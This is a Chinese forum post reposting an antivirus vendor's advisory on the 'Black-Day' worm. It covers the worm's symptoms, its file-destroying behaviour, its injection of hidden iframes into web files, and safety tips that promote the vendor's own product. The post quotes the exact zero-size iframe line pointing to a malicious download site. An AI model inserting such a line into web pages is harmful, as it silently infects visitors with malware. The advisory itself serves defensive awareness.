仿佛破坏力不是很大,但是恢复比较困难,以下是我转载瑞星的关于这个病毒的细节,对于解决方法,瑞星只说了用他的软件,有打广告的嫌疑
此程序为Worm类型程序, 这是一个采用Dehlip编写的蠕虫病毒。
1、中毒后的现像:
<1>被感染的程序所有的图标会变成一个黑bomb的图标。
<2>病毒作者在被感染后的文件激活该蠕虫时会弹出一个对话框,内容如下;意思是告诉用户你的电脑已感染病毒,如果想要恢复数据,请联系QQ5188340,87408749,76665639,其实被感染的文件已经被病毒完全破坏导致无法恢复。
By : wswhacker
Hi,Friend:
Your computer were infect my worm!
And if you want to clear this worm
Please add my QQ Num:5188340,87408749,76665639
The worm Name:Black-Day
Powered by :wswhacker
2、破坏行为:
<1>感染网页相关文件。
该蠕虫会感染D盘到Z盘上的.asp|.htm|.html|.aspx|.PHP|.JSP文件。在原文件最后插入一个Iframe标签,使用户不知不觉中访问恶意站点。Iframe标签的内容如下:
<iframe src='http://www.dadayouxi.net/Black-Day.htm' width=0 height=0></iframe>其中,
http://www.dadayouxi.net网站含有恶意代码,当你打开该网页时,该蠕虫已经被下载到本地计算机并尝试运行。如果你电脑上装有卡卡上网助手的话,当你打开该网页时,会被卡卡助手自动拦截。
<2>破坏文件
该蠕虫会把D盘到Z盘上所有的小于自身文件长度的文件删除,然后把自己伪装成目标文件。对于大于自身文件长度的文件,该蠕虫将用自己的文件内容覆盖目标文件,目标文件长度不发生改变。被破坏的文件的文件名不会发生改变。
安全建议:
1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级,瑞星杀毒软件每天至少升级三次。
2 使用“瑞星系统安全漏洞扫描”,打好补丁,弥补系统漏洞。
3 不浏览不良网站,不随意下载安装可疑插件。
4 不接收QQ、MSN、Emial等传来的可疑文件。
5 上网时打开杀毒软件实时监控功能。
6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中,可以有效保护密码安全。
清除办法:
瑞星杀毒软件清除办法:
安装瑞星杀毒软件,升级到19.18.40版以上,对电脑进行全盘扫描,按照软件提示进行操作,即可彻底查杀。
大家注意预防一下下
